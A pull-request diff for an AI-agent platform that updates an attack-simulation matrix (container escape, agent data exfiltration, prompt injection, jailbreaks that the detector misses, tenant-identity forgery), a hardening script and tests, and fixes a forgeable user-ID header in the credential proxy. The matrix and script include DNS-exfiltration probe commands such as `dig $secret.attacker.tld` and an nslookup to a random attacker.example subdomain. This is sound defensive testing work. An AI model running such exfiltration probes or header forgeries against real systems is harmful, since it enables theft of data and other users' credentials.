### PR TITLE
Attack-sim refresh + fix cross-user MCP credential injection

### DIFF
--- a/docs/17-attack-simulation-matrix-cn.md
+++ b/docs/17-attack-simulation-matrix-cn.md
@@ -11,7 +11,7 @@
 - [`13-safety-overview.md`](13-safety-overview.md) —— 三层模型
 - [`14-container-hardening-architecture.md`](14-container-hardening-architecture.md) —— A 和 G 类
 - [`15-safety-framework-architecture.md`](15-safety-framework-architecture.md) —— B4、C、D 类（内容检查）
-- [`16-egress-control-architecture.md`](16-egress-control-architecture.md) —— D4 以及 B 的部分（网络外泄）
+- [`16-egress-control-architecture.md`](16-egress-control-architecture.md) —— D4、I 类（网络 egress / 网关面）以及 B 的部分（网络外泄）
 - [`6-auth-architecture.md`](6-auth-architecture.md)、[`4-multi-tenant-architecture.md`](4-multi-tenant-architecture.md) —— E 类
 
 ---
@@ -28,6 +28,8 @@
 ## A. 容器逃逸 / 沙箱突破
 
 由 [`14-container-hardening-architecture.md`](14-container-hardening-architecture.md) 支撑。
+
+下方的 Docker `HostConfig` 契约在 Kubernetes 上同样成立（`ROLEMESH_CONTAINER_RUNTIME=k8s`）：同一个 `ContainerSpec` 被映射为 pod `securityContext` + pod-spec 字段，由 `test_A_container_escape_k8s_spec.py` 钉点（drop ALL caps、`readOnlyRootFilesystem`、`allowPrivilegeEscalation:false`、seccomp `RuntimeDefault`、`runAsNonRoot`、`automountServiceAccountToken:false`，以及 default-deny / gateway-only egress 所依赖的 agent NetworkPolicy 标签契约）。
 
 | ID | 攻击 | 防御 | 测试 | 状态 |
 |---|---|---|---|---|
@@ -78,7 +80,7 @@
 | D1 | LLM 输出中的 PII（SSN / CC） | `pii.regex` 检查 | `test_D_data_exfil::test_D1_*` | ✅ |
 | D2 | 工具调用至攻击者 URL（dict 字段） | `domain_allowlist` 检查 | `test_D2_tool_call_to_attacker_url_blocked` | ✅ |
 | D3 | URL 隐藏在 Bash 命令字符串内 | `domain_allowlist` 遍历字符串叶节点 | `test_D3_url_in_bash_command_string_detected` | ✅ |
-| D4 | 通过 `dig $secret.attacker.tld` 进行 DNS 外泄 | 权威 DNS 解析器 + 每租户允许列表（EC-2） | `test_D4_dns_exfiltration_prevented` | 该行历史上为 ❌ xfail，等待 EC-2；EC-2 已落地（参见 [`16-egress-control-architecture.md`](16-egress-control-architecture.md)）—— 当前状态以测试结果为准 |
+| D4 | 通过 `dig $secret.attacker.tld` 进行 DNS 外泄 | egress 网关权威 DNS 解析器 —— `enforce` 模式 + 空的**平台**允许列表，将任何未在白名单内的名字 NXDOMAIN（EC-2）；DNS 是平台级策略，非每租户（参见 [`16-egress-control-architecture.md`](16-egress-control-architecture.md)） | `test_D4_dns_exfiltration_blocked_by_egress_dns_policy`、`test_D4_dns_allowlist_is_positive_and_subdomain_safe` | ✅（此处钉策略契约；网关 socket 路径在 `tests/egress/test_dns_*`） |
 | D5 | Pastebin / transfer.sh 数据投放 | `domain_allowlist`（正向允许列表） | `test_D5_paste_services_blocked`（4 个主机） | ✅ |
 
 ---
@@ -87,11 +89,13 @@
 
 由 [`4-multi-tenant-architecture.md`](4-multi-tenant-architecture.md)（双池 RLS）和 [`6-auth-architecture.md`](6-auth-architecture.md)（IPC 信任边界）支撑。
 
+最初的 E1/E2 打在 approval engine 上，已随 human-approval 子系统一起删除。其防御——信任来自 coworker 查询的权威租户，绝不信任负载中的声明——现在存活于 safety RPC / 事件面（`SafetyRpcServer._handle_request_inner`、`safety/subscriber.py`）；测试在那里钉点。
+
 | ID | 攻击 | 防御 | 测试 | 状态 |
 |---|---|---|---|---|
-| E1 | 在 NATS 负载中伪造 tenantId | Engine `_tenant_matches` 守卫 | `test_E_tenant_isolation::test_E1_*` | ✅ |
-| E2 | 伪造属于另一租户的 coworkerId | IPC 分发器使用源 coworker 的权威租户 | `test_E2_forged_coworker_id_dropped` | ✅ |
-| E6 | NATS subject 侧信道（A 读取 B 的任务） | NATS account-per-tenant（未实现） | `test_E6_nats_subject_sidechannel_isolation` | ❌ xfail（NATS ACL 缺口） |
+| E1 | 在请求负载中伪造 tenantId | 当声明的租户 ≠ coworker 的权威租户时 `SafetyRpcServer` 丢弃 | `test_E_tenant_isolation::test_E1_forged_tenant_id_dropped` | ✅ |
+| E2 | 伪造属于另一租户的 coworkerId | 守卫锚定 coworker 的权威租户，而非声明 | `test_E2_forged_coworker_id_dropped`、`test_E2b_unknown_coworker_id_dropped` | ✅ |
+| E6 | NATS subject 侧信道 —— *一致的*伪造（victim coworker_id **加**匹配的 tenant_id）经核心 NATS | NATS account-per-tenant / 租户范围凭据（未实现） | `test_E6_consistent_cross_tenant_forge_is_rejected` | ❌ xfail（NATS ACL 缺口） |
 
 ---
 
@@ -122,20 +126,36 @@
 
 ---
 
-## 计数汇总（快照，2026-04-22）
+## I. 网络 egress（网关面）
 
-下方计数取自矩阵首次草拟之时。运行 `pytest tests/attack_sim/ -v` 获取实时情况。
+第三道防御层：每一次对外 TCP/HTTP(S) 尝试都经转发代理收口，每一次原始 DNS 查询都经网关的权威解析器，两者都执行**正向**允许列表。由 [`16-egress-control-architecture.md`](16-egress-control-architecture.md) 支撑。socket / CONNECT 管线由 `tests/egress/` 覆盖；下列各行是覆盖在策略契约之上的攻击叙事钉点，经真实网关 seam（`make_egress_domain_check`、`GlobalDnsPolicy`）驱动。
+
+| ID | 攻击 | 防御 | 测试 | 状态 |
+|---|---|---|---|---|
+| I1 | 转发代理 CONNECT 到非白名单攻击者主机（含后缀混淆 `github.com.attacker.tld`） | `egress.domain_rule` 报告无匹配 → 聚合器 block | `test_I_egress_gateway::test_I1_*`（4 个主机） | ✅ |
+| I2 | 端口夹带 —— 白名单 SNI 但非白名单端口（`*.github.com` 上的 SSH） | 规则上的 `ports` 端口约束 | `test_I2_allowlisted_name_on_wrong_port_not_matched` | ✅ |
+| I3 | 畸形 egress 规则配置（键名拼错、空列表、`extra`、非 dict） | 适配器 fail **closed** —— 任何配置错误 ⇒ 无匹配 | `test_I3_malformed_config_fails_closed`（5 种用例） | ✅ |
+| I4 | 空 / 截断的主机 | 空主机永不计为允许列表匹配 | `test_I4_empty_host_not_matched` | ✅ |
+| I5 | DNS 外泄默认姿态 / 拼错的解析器模式 | `GlobalDnsPolicy` `enforce` + 空允许列表；`from_env` 拒绝未知模式（fail-closed 启动） | `test_I5_*`（2） | ✅ |
+
+---
+
+## 计数汇总（快照，2026-06-25）
+
+下方计数取自本次更新之时。运行 `pytest tests/attack_sim/ -v` 获取实时情况。
 
 | 类别 | ✅ | ❌ xfail | 📝 docs-only | 🔧 manual-only |
 |---|---|---|---|---|
-| A. 容器 | 12 | 0 | 0 | 6 共享 |
+| A. 容器（Docker） | 12 | 0 | 0 | 6 共享 |
+| A. 容器（K8s） | 8 | 0 | 0 | 0 |
 | B. 密钥 | 10 | 1 | 1 | 1 |
 | C. Prompt 注入 | 7 | 0 | 3 | 0 |
-| D. 数据外泄 | 7 | 1 | 0 | 0 |
-| E. 租户隔离 | 2 | 1 | 0 | 0 |
+| D. 数据外泄 | 9 | 0 | 0 | 0 |
+| E. 租户隔离 | 4 | 1 | 0 | 0 |
 | G. DoS | 3 | 0 | 0 | 2 |
 | H. 配置 | 8 | 0 | 0 | 1 |
-| **合计** | **49** | **3** | **4** | **10** |
+| I. 网络 egress | 13 | 0 | 0 | 0 |
+| **合计** | **74** | **2** | **4** | **10** |
 
 ---
 
@@ -144,15 +164,15 @@
 当相应防御层落地后，下列项会成为"进展信号"：
 
 1. **B2 凭据代理枚举** —— 通过对凭据代理实施限流或按 agent 鉴权来关闭。
-2. **D4 DNS 外泄** —— EC-2 已落地，带权威 DNS 解析器 + 每租户允许列表（参见 [`16-egress-control-architecture.md`](16-egress-control-architecture.md)）；待测试重写以覆盖网关侧路径后，可以撤销该 xfail。
-3. **E6 NATS subject 侧信道** —— 通过 NATS account-per-tenant 或租户范围的 NATS 凭据来关闭。
+2. **E6 一致的跨租户身份伪造** —— safety 面守卫能拦住*不一致*的伪造（coworker_id 与 tenant_id 来自不同租户），但一个在核心 NATS 上呈现 victim 匹配的 coworker_id **加** tenant_id 的连接会被接受。通过 NATS account-per-tenant / 租户范围凭据来关闭，使一个连接根本无法代表另一租户发言。
+
+（D4 DNS 外泄此前在本清单上；EC-2 已交付权威 DNS 解析器，D4 现已是通过的测试 —— 参见 D / I 类。）
 
 ## 已文档化的限制（已评估，在 v1 中选择不防御）
 
 - **B4' 切分密钥** —— detect-secrets 基于模式 + 熵；LLM 作为扫描器的第二层可以捕捉这些。v1 不发布。
 - **C2 DAN-family 越狱** —— llm-guard 越狱检测器漏掉这些。已在测试中文档化为仅打印；当检测器或自定义检查能捕捉时再翻为 ✅。
 - **C4 base64 包装的注入** —— 模式检测器漏掉；需要基于 LLM 的扫描器。
-- **F6 Stop / proposal NATS 竞争** —— 孤儿 pending 行在 `auto_expire_minutes` 内被过期回收。完美回收的成本（一张 `cancelled_jobs` 追踪表）在 v1 中不值得。
 - **仅 runbook 的手动项** —— 需要实际运行的容器；规约级钉点在自动化测试中，运行时验证在 `scripts/verify-hardening.sh` 中。
 
 ---

--- a/docs/17-attack-simulation-matrix-cn.md
+++ b/docs/17-attack-simulation-matrix-cn.md
@@ -97,6 +97,15 @@
 | E2 | 伪造属于另一租户的 coworkerId | 守卫锚定 coworker 的权威租户，而非声明 | `test_E2_forged_coworker_id_dropped`、`test_E2b_unknown_coworker_id_dropped` | ✅ |
 | E6 | NATS subject 侧信道 —— *一致的*伪造（victim coworker_id **加**匹配的 tenant_id）经核心 NATS | NATS account-per-tenant / 租户范围凭据（未实现） | `test_E6_consistent_cross_tenant_forge_is_rejected` | ❌ xfail（NATS ACL 缺口） |
 
+### 身份隔离（credential-proxy 平面）
+
+per-user / per-tenant 的凭据隔离在 credential proxy（`rolemesh.egress.reverse_proxy`）这一层执行，不在模型。半可信容器可以在出站请求上塞任意 `X-RoleMesh-User-Id`,所以代理必须从**验证过的**签名 token 取身份（`identity`,来自 `TokenAuthority.verify`),绝不取该 header。
+
+| ID | 攻击 | 防御 | 测试 | 状态 |
+|---|---|---|---|---|
+| E7（MCP） | 在 userA 的 token 请求上伪造 `X-RoleMesh-User-Id: userB`,企图从共享 vault 拿到 userB 的 OIDC token | MCP 路径用 `identity.user_id` 而非 header 做 vault 查询（不符则记录并忽略 header） | `test_E_identity_isolation::test_E7_mcp_forged_user_id_header_does_not_select_another_users_token` | ✅（已修 —— 此前代理信任该 header） |
+| E7（provider） | 伪造 `X-RoleMesh-User-Id` 企图左右 LLM 凭据选择 | LLM 凭据按 `identity.tenant_id` 解析,header 不参与 | `test_E7_provider_credential_selection_ignores_forged_user_id_header` | ✅（对照） |
+
 ---
 
 ## G. 拒绝服务
@@ -151,11 +160,11 @@
 | B. 密钥 | 10 | 1 | 1 | 1 |
 | C. Prompt 注入 | 7 | 0 | 3 | 0 |
 | D. 数据外泄 | 9 | 0 | 0 | 0 |
-| E. 租户隔离 | 4 | 1 | 0 | 0 |
+| E. 租户 + 身份隔离 | 6 | 1 | 0 | 0 |
 | G. DoS | 3 | 0 | 0 | 2 |
 | H. 配置 | 8 | 0 | 0 | 1 |
 | I. 网络 egress | 13 | 0 | 0 | 0 |
-| **合计** | **74** | **2** | **4** | **10** |
+| **合计** | **76** | **2** | **4** | **10** |
 
 ---
 

--- a/docs/17-attack-simulation-matrix.md
+++ b/docs/17-attack-simulation-matrix.md
@@ -97,6 +97,15 @@ The original E1/E2 drove the approval engine, removed with the human-approval su
 | E2 | Forge coworkerId belonging to another tenant | Guard anchors on the coworker's authoritative tenant, not the claim | `test_E2_forged_coworker_id_dropped`, `test_E2b_unknown_coworker_id_dropped` | ✅ |
 | E6 | NATS subject sidechannel — a *consistent* forge (victim coworker_id **and** matching tenant_id) on core NATS | NATS account-per-tenant / tenant-scoped credentials (not implemented) | `test_E6_consistent_cross_tenant_forge_is_rejected` | ❌ xfail (NATS ACL gap) |
 
+### Identity isolation (credential-proxy plane)
+
+Per-user / per-tenant credential isolation is enforced at the credential proxy (`rolemesh.egress.reverse_proxy`), not the model. A half-trusted container can put any `X-RoleMesh-User-Id` on its outbound requests, so the proxy must derive identity from the **verified** signed token (`identity` from `TokenAuthority.verify`), never that header.
+
+| ID | Attack | Defense | Test | Status |
+|---|---|---|---|---|
+| E7 (MCP) | Forge `X-RoleMesh-User-Id: userB` on a userA-token request to be handed userB's OIDC token from the shared vault | MCP path keys the vault lookup on `identity.user_id`, not the header (mismatch logged, header ignored) | `test_E_identity_isolation::test_E7_mcp_forged_user_id_header_does_not_select_another_users_token` | ✅ (fixed — the proxy previously trusted the header) |
+| E7 (provider) | Forge `X-RoleMesh-User-Id` to steer LLM credential selection | LLM credential resolves by `identity.tenant_id`; the header plays no part | `test_E7_provider_credential_selection_ignores_forged_user_id_header` | ✅ (control) |
+
 ---
 
 ## G. Denial of service
@@ -151,11 +160,11 @@ The counts below were taken at the time the matrix was first drafted. Run `pytes
 | B. Secrets | 10 | 1 | 1 | 1 |
 | C. Prompt injection | 7 | 0 | 3 | 0 |
 | D. Data exfil | 9 | 0 | 0 | 0 |
-| E. Tenant iso | 4 | 1 | 0 | 0 |
+| E. Tenant + identity iso | 6 | 1 | 0 | 0 |
 | G. DoS | 3 | 0 | 0 | 2 |
 | H. Config | 8 | 0 | 0 | 1 |
 | I. Network egress | 13 | 0 | 0 | 0 |
-| **Total** | **74** | **2** | **4** | **10** |
+| **Total** | **76** | **2** | **4** | **10** |
 
 ---
 

--- a/docs/17-attack-simulation-matrix.md
+++ b/docs/17-attack-simulation-matrix.md
@@ -11,7 +11,7 @@ For the design rationale behind each defense layer, see:
 - [`13-safety-overview.md`](13-safety-overview.md) — the three-layer model
 - [`14-container-hardening-architecture.md`](14-container-hardening-architecture.md) — A and G categories
 - [`15-safety-framework-architecture.md`](15-safety-framework-architecture.md) — B4, C, D categories (content checks)
-- [`16-egress-control-architecture.md`](16-egress-control-architecture.md) — D4 and parts of B (network exfil)
+- [`16-egress-control-architecture.md`](16-egress-control-architecture.md) — D4, the I (network egress / gateway plane) category, and parts of B (network exfil)
 - [`6-auth-architecture.md`](6-auth-architecture.md), [`4-multi-tenant-architecture.md`](4-multi-tenant-architecture.md) — E category
 
 ---
@@ -28,6 +28,8 @@ For the design rationale behind each defense layer, see:
 ## A. Container escape / sandbox breakout
 
 Backed by [`14-container-hardening-architecture.md`](14-container-hardening-architecture.md).
+
+The Docker `HostConfig` contract below is mirrored on Kubernetes (`ROLEMESH_CONTAINER_RUNTIME=k8s`): the same `ContainerSpec` maps to a pod `securityContext` + pod-spec fields, pinned in `test_A_container_escape_k8s_spec.py` (drop ALL caps, `readOnlyRootFilesystem`, `allowPrivilegeEscalation:false`, seccomp `RuntimeDefault`, `runAsNonRoot`, `automountServiceAccountToken:false`, plus the agent-NetworkPolicy label contract for default-deny / gateway-only egress).
 
 | ID | Attack | Defense | Test | Status |
 |---|---|---|---|---|
@@ -78,7 +80,7 @@ Backed by [`15-safety-framework-architecture.md`](15-safety-framework-architectu
 | D1 | PII (SSN / CC) in LLM output | `pii.regex` check | `test_D_data_exfil::test_D1_*` | ✅ |
 | D2 | Tool call to attacker URL (dict field) | `domain_allowlist` check | `test_D2_tool_call_to_attacker_url_blocked` | ✅ |
 | D3 | URL hidden inside Bash command string | `domain_allowlist` walks string leaves | `test_D3_url_in_bash_command_string_detected` | ✅ |
-| D4 | DNS exfil via `dig $secret.attacker.tld` | Authoritative DNS resolver + per-tenant allowlist (EC-2) | `test_D4_dns_exfiltration_prevented` | This row was historically ❌ xfail pending EC-2; EC-2 has since landed (see [`16-egress-control-architecture.md`](16-egress-control-architecture.md)) — check the test outcome for the current status |
+| D4 | DNS exfil via `dig $secret.attacker.tld` | Egress gateway authoritative DNS resolver — `enforce` mode + empty **platform** allowlist NXDOMAINs any non-allowlisted name (EC-2); DNS is a platform policy, not per-tenant (see [`16-egress-control-architecture.md`](16-egress-control-architecture.md)) | `test_D4_dns_exfiltration_blocked_by_egress_dns_policy`, `test_D4_dns_allowlist_is_positive_and_subdomain_safe` | ✅ (policy contract here; gateway-socket path in `tests/egress/test_dns_*`) |
 | D5 | Pastebin / transfer.sh data drop | `domain_allowlist` (positive allowlist) | `test_D5_paste_services_blocked` (4 hosts) | ✅ |
 
 ---
@@ -87,11 +89,13 @@ Backed by [`15-safety-framework-architecture.md`](15-safety-framework-architectu
 
 Backed by [`4-multi-tenant-architecture.md`](4-multi-tenant-architecture.md) (dual-pool RLS) and [`6-auth-architecture.md`](6-auth-architecture.md) (IPC trust boundary).
 
+The original E1/E2 drove the approval engine, removed with the human-approval subsystem. The defense — trust the authoritative tenant from the coworker lookup, never the payload's claim — now lives on the safety RPC / event planes (`SafetyRpcServer._handle_request_inner`, `safety/subscriber.py`); the tests pin it there.
+
 | ID | Attack | Defense | Test | Status |
 |---|---|---|---|---|
-| E1 | Forge tenantId in NATS payload | Engine `_tenant_matches` guard | `test_E_tenant_isolation::test_E1_*` | ✅ |
-| E2 | Forge coworkerId belonging to another tenant | IPC dispatcher uses source coworker's authoritative tenant | `test_E2_forged_coworker_id_dropped` | ✅ |
-| E6 | NATS subject sidechannel (A reads B's tasks) | NATS account-per-tenant (not implemented) | `test_E6_nats_subject_sidechannel_isolation` | ❌ xfail (NATS ACL gap) |
+| E1 | Forge tenantId in the request payload | `SafetyRpcServer` drops when the claimed tenant ≠ the coworker's authoritative tenant | `test_E_tenant_isolation::test_E1_forged_tenant_id_dropped` | ✅ |
+| E2 | Forge coworkerId belonging to another tenant | Guard anchors on the coworker's authoritative tenant, not the claim | `test_E2_forged_coworker_id_dropped`, `test_E2b_unknown_coworker_id_dropped` | ✅ |
+| E6 | NATS subject sidechannel — a *consistent* forge (victim coworker_id **and** matching tenant_id) on core NATS | NATS account-per-tenant / tenant-scoped credentials (not implemented) | `test_E6_consistent_cross_tenant_forge_is_rejected` | ❌ xfail (NATS ACL gap) |
 
 ---
 
@@ -122,20 +126,36 @@ Backed by [`6-auth-architecture.md`](6-auth-architecture.md) and [`15-safety-fra
 
 ---
 
-## Summary counts (snapshot, 2026-04-22)
+## I. Network egress (gateway plane)
+
+The third defense layer: every outbound TCP/HTTP(S) attempt is funneled through the forward proxy and every raw DNS lookup through the gateway's authoritative resolver, both enforcing a **positive** allowlist. Backed by [`16-egress-control-architecture.md`](16-egress-control-architecture.md). The socket / CONNECT plumbing is covered by `tests/egress/`; these rows are the attack-narrative pins over the policy contracts those sockets enforce, driven through the real gateway seams (`make_egress_domain_check`, `GlobalDnsPolicy`).
+
+| ID | Attack | Defense | Test | Status |
+|---|---|---|---|---|
+| I1 | Forward-proxy CONNECT to a non-allowlisted attacker host (incl. suffix-confusion `github.com.attacker.tld`) | `egress.domain_rule` reports no match → aggregator blocks | `test_I_egress_gateway::test_I1_*` (4 hosts) | ✅ |
+| I2 | Port smuggling — allowlisted SNI on a non-allowlisted port (SSH on `*.github.com`) | `ports` scoping on the rule | `test_I2_allowlisted_name_on_wrong_port_not_matched` | ✅ |
+| I3 | Malformed egress rule config (typo'd key, empty list, `extra`, non-dict) | Adapter fails **closed** — any config error ⇒ no match | `test_I3_malformed_config_fails_closed` (5 cases) | ✅ |
+| I4 | Empty / truncated host | An empty host never counts as an allowlist match | `test_I4_empty_host_not_matched` | ✅ |
+| I5 | DNS exfil default posture / typo'd resolver mode | `GlobalDnsPolicy` `enforce` + empty allowlist; `from_env` rejects an unknown mode (fail-closed boot) | `test_I5_*` (2) | ✅ |
+
+---
+
+## Summary counts (snapshot, 2026-06-25)
 
 The counts below were taken at the time the matrix was first drafted. Run `pytest tests/attack_sim/ -v` for the live picture.
 
 | Category | ✅ | ❌ xfail | 📝 docs-only | 🔧 manual-only |
 |---|---|---|---|---|
-| A. Container | 12 | 0 | 0 | 6 shared |
+| A. Container (Docker) | 12 | 0 | 0 | 6 shared |
+| A. Container (K8s) | 8 | 0 | 0 | 0 |
 | B. Secrets | 10 | 1 | 1 | 1 |
 | C. Prompt injection | 7 | 0 | 3 | 0 |
-| D. Data exfil | 7 | 1 | 0 | 0 |
-| E. Tenant iso | 2 | 1 | 0 | 0 |
+| D. Data exfil | 9 | 0 | 0 | 0 |
+| E. Tenant iso | 4 | 1 | 0 | 0 |
 | G. DoS | 3 | 0 | 0 | 2 |
 | H. Config | 8 | 0 | 0 | 1 |
-| **Total** | **49** | **3** | **4** | **10** |
+| I. Network egress | 13 | 0 | 0 | 0 |
+| **Total** | **74** | **2** | **4** | **10** |
 
 ---
 
@@ -144,15 +164,15 @@ The counts below were taken at the time the matrix was first drafted. Run `pytes
 These will be "progress signals" when their defense layer lands:
 
 1. **B2 credential-proxy enumeration** — close via rate-limit or per-agent auth on the credential proxy.
-2. **D4 DNS exfiltration** — EC-2 has landed with an authoritative DNS resolver + per-tenant allowlist (see [`16-egress-control-architecture.md`](16-egress-control-architecture.md)); the xfail can be retired once the test is rewritten to exercise the gateway-side path.
-3. **E6 NATS subject sidechannel** — close via NATS account-per-tenant or tenant-scoped NATS credentials.
+2. **E6 consistent cross-tenant identity forge** — the safety-plane guard catches an *inconsistent* forge (coworker_id and tenant_id from different tenants), but a connection presenting a victim's matching coworker_id **and** tenant_id on core NATS is accepted. Close via NATS account-per-tenant / tenant-scoped credentials so a connection cannot speak for another tenant at all.
+
+(D4 DNS exfiltration was previously on this list; EC-2 shipped the authoritative DNS resolver and D4 is now a passing test — see category D / I.)
 
 ## Documented limitations (we looked, chose not to defend in v1)
 
 - **B4' split secrets** — detect-secrets is pattern + entropy; an LLM-as-scanner second layer could catch these. Not shipping in v1.
 - **C2 DAN-family jailbreak** — llm-guard jailbreak detector misses these. Documented in test as print-only; will flip to ✅ when detector or custom check catches.
 - **C4 base64-wrapped injection** — pattern detector misses; LLM-based scanner needed.
-- **F6 Stop / proposal NATS race** — orphan pending row reaped by expiry within `auto_expire_minutes`. Cost of perfect reap (a `cancelled_jobs` tracking table) not justified in v1.
 - **Manual runbook-only items** — require a live container; spec-level pin is in automated tests, runtime verification in `scripts/verify-hardening.sh`.
 
 ---

--- a/scripts/verify-hardening.sh
+++ b/scripts/verify-hardening.sh
@@ -126,15 +126,19 @@ echo
 # D. Data exfil — DNS
 # ---------------------------------------------------------------------
 
-echo "D. DNS exfiltration (currently UNDEFENDED)"
+echo "D. DNS exfiltration (defended by the egress gateway when deployed behind it)"
 
 # D4. DNS exfil — dig any subdomain of an arbitrary attacker zone.
-# Expected NOW: succeeds (egress control not implemented).
-# Expected AFTER EC-2 ships: NXDOMAIN.
+# EC-2 shipped the gateway authoritative DNS resolver (enforce + empty
+# platform allowlist → NXDOMAIN for non-allowlisted names). So:
+#   - Agent behind the gateway (compose/k8s deploy): NXDOMAIN → blocked.
+#   - Bare container with no gateway resolver (dev): may still resolve.
+# A [GAP] here means this container is NOT routed through the gateway's
+# DnsServer — check the deploy wiring, not the code.
 if _exec 'timeout 2 nslookup $(head -c 10 /dev/urandom | xxd -p).attacker.example 2>&1 | grep -qv "NXDOMAIN"'; then
-    echo "  [GAP] D4 DNS exfil succeeded (known gap; egress control not shipped)"
+    echo "  [GAP] D4 DNS exfil succeeded — this container is not behind the egress gateway resolver (deploy wiring)"
 else
-    _pass "D4 DNS exfil blocked — EC-2 or equivalent has landed"
+    _pass "D4 DNS exfil blocked — egress gateway DNS resolver (EC-2) engaged"
 fi
 
 echo

--- a/src/rolemesh/egress/reverse_proxy.py
+++ b/src/rolemesh/egress/reverse_proxy.py
@@ -612,7 +612,24 @@ async def start_credential_proxy(
         fwd_headers = _forward_headers(request)
         fwd_headers.update(server_headers)
 
-        user_id = request.headers.get(_USER_ID_HEADER)
+        # Identity for per-user token forwarding comes from the VERIFIED
+        # egress token (identity.user_id), never the X-RoleMesh-User-Id
+        # request header. A half-trusted container can set that header to
+        # any user and would otherwise be handed another user's OIDC token
+        # from the shared vault (cross-user / cross-tenant credential theft).
+        # The header is set by the agent_runner for convenience but is
+        # untrusted; a mismatch is logged as an anomaly, then ignored.
+        user_id = identity.user_id if identity is not None else None
+        claimed = request.headers.get(_USER_ID_HEADER)
+        if claimed and claimed != user_id:
+            logger.warning(
+                "mcp-proxy: X-RoleMesh-User-Id header does not match the token "
+                "identity — ignoring the header",
+                component="egress",
+                server=server_name,
+                claimed_user=claimed,
+                identity_user=user_id,
+            )
         if mcp_auth_mode in ("user", "both") and user_id and _token_vault is not None:
             access_token = await _token_vault.get_fresh_access_token(user_id)
             if access_token:

--- a/tests/attack_sim/README.md
+++ b/tests/attack_sim/README.md
@@ -12,12 +12,15 @@ failing, a known defense just regressed.
 
 | File | Category | Defenses exercised |
 |---|---|---|
-| `test_A_container_escape_spec.py` | Container escape / sandbox breakout | Container hardening R1-R9 |
+| `test_A_container_escape_spec.py` | Container escape / sandbox breakout (Docker) | Container hardening R1-R9 (`HostConfig`) |
+| `test_A_container_escape_k8s_spec.py` | Container escape / sandbox breakout (Kubernetes) | Pod `securityContext` + agent NetworkPolicy label contract |
 | `test_B_secret_exfil.py` | Credential / secret theft | Env allowlist + safety `secret_scanner` |
 | `test_C_prompt_injection.py` | Prompt injection / jailbreak | Safety `llm_guard.prompt_injection`, `llm_guard.jailbreak` |
-| `test_D_data_exfil.py` | Data exfiltration (PII, URL, DNS) | Safety `pii.regex`, `presidio.pii`, `domain_allowlist` |
+| `test_D_data_exfil.py` | Data exfiltration (PII, URL, DNS) | Safety `pii.regex`, `domain_allowlist`, egress `GlobalDnsPolicy` |
+| `test_E_tenant_isolation.py` | Tenant isolation | `SafetyRpcServer` authoritative-tenant guard |
 | `test_G_dos.py` | Denial of service | Pipeline resilience, worker queueing, rate limits |
 | `test_H_config_attack.py` | Configuration-layer attack | Pydantic validation, AgentPermissions |
+| `test_I_egress_gateway.py` | Network egress (gateway plane) | `egress.domain_rule` allowlist + `GlobalDnsPolicy` |
 
 ## Running
 
@@ -35,15 +38,22 @@ pytest tests/attack_sim/ -v
 
 ## Expected failures (xfail)
 
-Some tests are explicit `xfail` markers documenting **known undefended
-attacks**. They will start passing once the matching defense layer is
-shipped. Do not silence them — they are the success metric for the
-next security layer.
+Some tests are explicit `strict=True xfail` markers documenting **known
+undefended attacks**. They will start passing (XPASS, which strict mode
+turns into a failure) once the matching defense layer is shipped. Do not
+silence them — they are the success metric for the next security layer.
 
-- `test_D_data_exfil::test_dns_exfiltration_via_dig` → blocked by
-  egress control (EC-1/EC-2, not yet implemented)
-- `test_B_secret_exfil::test_read_other_coworker_env_via_proc` →
-  blocked by seccomp (verified manually via `verify-hardening.sh`)
+- `test_B_secret_exfil::test_B2_credential_proxy_path_enumeration_rate_limited`
+  → closes with a rate-limit or per-agent auth on the credential proxy
+  (today an attacker inside a compromised container can enumerate
+  registered MCP endpoints by probing paths).
+- `test_E_tenant_isolation::test_E6_consistent_cross_tenant_forge_is_rejected`
+  → closes with NATS account-per-tenant / tenant-scoped credentials; the
+  safety-plane guard catches an *inconsistent* identity forge but not a
+  fully consistent one on core NATS.
+
+(The previous D4 DNS-exfil xfail was retired — EC-2 shipped the
+authoritative DNS resolver, so `test_D4_*` now asserts the defense holds.)
 
 ## Companion manual runbook
 

--- a/tests/attack_sim/README.md
+++ b/tests/attack_sim/README.md
@@ -18,6 +18,7 @@ failing, a known defense just regressed.
 | `test_C_prompt_injection.py` | Prompt injection / jailbreak | Safety `llm_guard.prompt_injection`, `llm_guard.jailbreak` |
 | `test_D_data_exfil.py` | Data exfiltration (PII, URL, DNS) | Safety `pii.regex`, `domain_allowlist`, egress `GlobalDnsPolicy` |
 | `test_E_tenant_isolation.py` | Tenant isolation | `SafetyRpcServer` authoritative-tenant guard |
+| `test_E_identity_isolation.py` | Identity isolation (credential proxy) | `identity.user_id` from the verified token, not the `X-RoleMesh-User-Id` header |
 | `test_G_dos.py` | Denial of service | Pipeline resilience, worker queueing, rate limits |
 | `test_H_config_attack.py` | Configuration-layer attack | Pydantic validation, AgentPermissions |
 | `test_I_egress_gateway.py` | Network egress (gateway plane) | `egress.domain_rule` allowlist + `GlobalDnsPolicy` |

--- a/tests/attack_sim/test_A_container_escape_k8s_spec.py
+++ b/tests/attack_sim/test_A_container_escape_k8s_spec.py
@@ -1,0 +1,207 @@
+"""A (Kubernetes). Container escape / sandbox breakout — K8s spec level.
+
+The Docker counterpart lives in ``test_A_container_escape_spec.py`` and
+asserts the ``HostConfig`` sent to dockerd. With ``ROLEMESH_CONTAINER_RUNTIME=k8s``
+(src/rolemesh/container/k8s_runtime.py) the SAME ``ContainerSpec`` is mapped
+onto a Pod manifest instead — so the identical hardening contract must hold
+on the Kubernetes plane, expressed as a pod ``securityContext`` + pod-spec
+fields rather than docker HostConfig keys.
+
+``spec_to_pod_manifest`` is a pure function with an import-free module top
+(no ``[k8s]`` extra needed) — these run anywhere the Docker A-tests do.
+
+Mapping of the A-series onto Kubernetes:
+
+  A2/A3  ptrace / kcore (need caps)  → capabilities.drop == [ALL], no add
+  A2     no-new-privileges           → allowPrivilegeEscalation: false
+  A2     seccomp default             → seccompProfile: RuntimeDefault
+  A4     rootfs write                → readOnlyRootFilesystem: true
+  A5     cloud metadata theft        → hostAliases blackhole + NetworkPolicy
+  A7     privileged container        → never privileged; runAsNonRoot
+  A9(k8s) ServiceAccount token theft → automountServiceAccountToken: false
+"""
+
+from __future__ import annotations
+
+from typing import Any
+
+from rolemesh.agent.executor import AgentBackendConfig
+from rolemesh.container.k8s_runtime import (
+    AGENT_POD_LABELS,
+    AGENT_ROLE_LABEL,
+    AGENT_ROLE_VALUE,
+    NETPOL_AGENT_ALLOW_EGRESS,
+    NETPOL_AGENT_DEFAULT_DENY,
+    REQUIRED_AGENT_NETWORK_POLICIES,
+    spec_to_pod_manifest,
+)
+from rolemesh.container.runner import build_container_spec
